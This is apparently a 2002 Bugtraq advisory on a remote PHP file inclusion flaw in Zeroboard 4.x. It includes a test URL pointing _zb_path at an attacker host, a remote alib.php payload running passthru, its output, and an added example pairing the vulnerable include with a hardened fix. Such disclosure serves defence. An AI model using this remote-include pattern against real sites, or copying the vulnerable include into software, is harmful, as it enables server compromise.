malicious PHP source injection
From: "I'm I" <onlooker@cnun.xsdeny.net>
Date: Sun, 16 Jun 2002 01:15:15 +0900
To: bugtraq@securityfocus.com
Message-ID: <20020615161515.GA18672@xsdeny.net>
JCC Security Advisory
June 15, 2002
malicious PHP source injection
Description
Zeroboard is one of the most popular PHP web boards in Korea.
When allow_url_fopen = On and register_globals = On in php.ini, Zeroboard is vulnerable because _head.php builds an include path from the variable _zb_path, and register_globals lets a remote client set that variable through the query string.
An attacker can therefore make the server include, and execute, an arbitrary file, including one fetched over HTTP from a host the attacker controls (remote PHP source injection).
Impact
All versions of Zeroboard 4.x are affected. Successful exploitation runs attacker-supplied PHP, and through it shell commands, with the privileges of the web server user.
Workaround
Set allow_url_fopen = Off and register_globals = Off in php.ini. register_globals = Off stops the query string from setting _zb_path at all; allow_url_fopen = Off additionally stops include from fetching remote URLs, but on its own it does not prevent inclusion of local files through the same variable.
Tested systems
Zeroboard 4.1pl2 on Debian GNU/Linux sid (x86)
Background
We confirmed the vulnerability with a request of the form http://BOARD_URL/_head.php?_zb_path=WANTED_TO_INCLUDE and
wrote a sample file, alib.php, on a host we control:
--------------------alib.php--------------
<? passthru("/bin/ls"); ?>
-----------------------------------------
_head.php appends lib.php to the supplied path, so the following URL makes the server fetch and execute http://MYBOX/alib.php:
TEST URL : http://BOARD_URL/_head.php?_zb_path=http://MYBOX/a
-------output-----------------------------
_foot.php _head.php admin admin.php admin_sendmail_ok.php admin_setup.php apply_vote.php check_user_id.php comment_ok.php config.php data del_comment.php del_comment_ok.php delete.php delete_ok.php download.php error.php icon image_box.php images include index.html install.php install1.php install2.php install2_ok.php install_ok.php latest_skin lib.php license.txt list_all.php login.php login_check.php logout.php lostid.php lostid_search.php member_join.php member_join_ok.php member_memo.php member_memo2.php member_memo3.php member_modify.php member_modify_ok.php member_out.php open_window.php outlogin.php outlogin_skin schema.sql script select_list_all.php send_message.php setup.php skin style.css view.php view_info.php view_info2.php view_preview.php vote.php write.php write_ok.php zboard.php zipcode
Fatal error: Call to undefined function: dbconn() in /home/morris/public_html/tmp/bbs/_head.php on line 41
-----------------------------------------
The listing is the board directory, printed by passthru() from the remote alib.php. The fatal error follows because our file was included in place of Zeroboard's own lib.php, which defines dbconn(); it confirms that the remote file, not the local one, was executed.
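The pattern described in the Description and reproduced above, as an added example that is not Zeroboard's code and not part of the original advisory: a reconstructed vulnerable include whose path is built from a variable the client can set under register_globals, next to a hardened replacement that maps a short key to a fixed location and verifies the resolved file stays under the board root. The variable name $_zb_path, the appended suffix lib.php and the directory layout are assumptions drawn from the test URL and the alib.php sample; the demo runs from the CLI against a temporary directory it creates itself.

```php
<?php
// Added example, not Zeroboard's own code. The variable name $_zb_path,
// the "lib.php" suffix and the directory layout are assumptions inferred
// from the advisory's test URL (…?_zb_path=http://MYBOX/a) and its alib.php.
declare(strict_types=1);

// Vulnerable pattern (reconstructed, do not deploy). With register_globals=On,
// a request to _head.php?_zb_path=http://MYBOX/a defines $_zb_path before this
// runs; with allow_url_fopen=On the resulting include fetches and executes
// http://MYBOX/alib.php. $globals stands in for what register_globals injects.
function vulnerable_include_path(array $globals): string
{
    $_zb_path = $globals['_zb_path'] ?? './';
    return $_zb_path . 'lib.php';     // attacker controls the whole prefix
}

// Hardened replacement: never build an include path from request data.
// Accept only a key from a fixed allow-list, resolve the candidate with
// realpath(), and require it to sit under the board root. This rejects
// remote URLs (realpath fails), traversal (../) and anything not listed.
function safe_include_path(string $key, string $boardRoot): ?string
{
    $allowed = ['default' => '', 'skin' => 'skin/'];   // assumed layout
    if (!array_key_exists($key, $allowed)) {
        return null;                                    // unknown key
    }
    $root      = realpath($boardRoot);
    $candidate = realpath($boardRoot . '/' . $allowed[$key] . 'lib.php');
    if ($root === false || $candidate === false) {
        return null;                                    // missing or remote
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                                    // escaped the root
    }
    return $candidate;
}

// Demonstration against a constructed temporary board directory.
$root = sys_get_temp_dir() . '/zb_demo_' . getmypid();
mkdir($root . '/skin', 0700, true);
file_put_contents($root . '/lib.php', "<?php\n");
file_put_contents($root . '/skin/lib.php', "<?php\n");

// What register_globals would hand the vulnerable code for the advisory's URL.
$attackerGlobals = ['_zb_path' => 'http://MYBOX/a'];
echo "vulnerable include target: ", vulnerable_include_path($attackerGlobals), "\n";

// The hardened resolver only ever yields files under $root.
echo "hardened 'default': ", safe_include_path('default', $root), "\n";
echo "hardened 'skin':    ", safe_include_path('skin', $root), "\n";
var_dump(safe_include_path('http://MYBOX/a', $root));    // not in allow-list
var_dump(safe_include_path('../../etc/passwd', $root));  // not in allow-list

// Clean up the constructed directory.
unlink($root . '/skin/lib.php');
unlink($root . '/lib.php');
rmdir($root . '/skin');
rmdir($root);
```

Run it with `php example.php`. The design point is that the hardened version does not try to sanitize the attacker's string; it discards it entirely in favour of a lookup key, so neither allow_url_fopen nor register_globals matters to its safety.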
Thanks to BlackNight at r0ar.
---
http://jcc.hackerslab.org (morris Chang)
e-mail : morris@xsdeny.net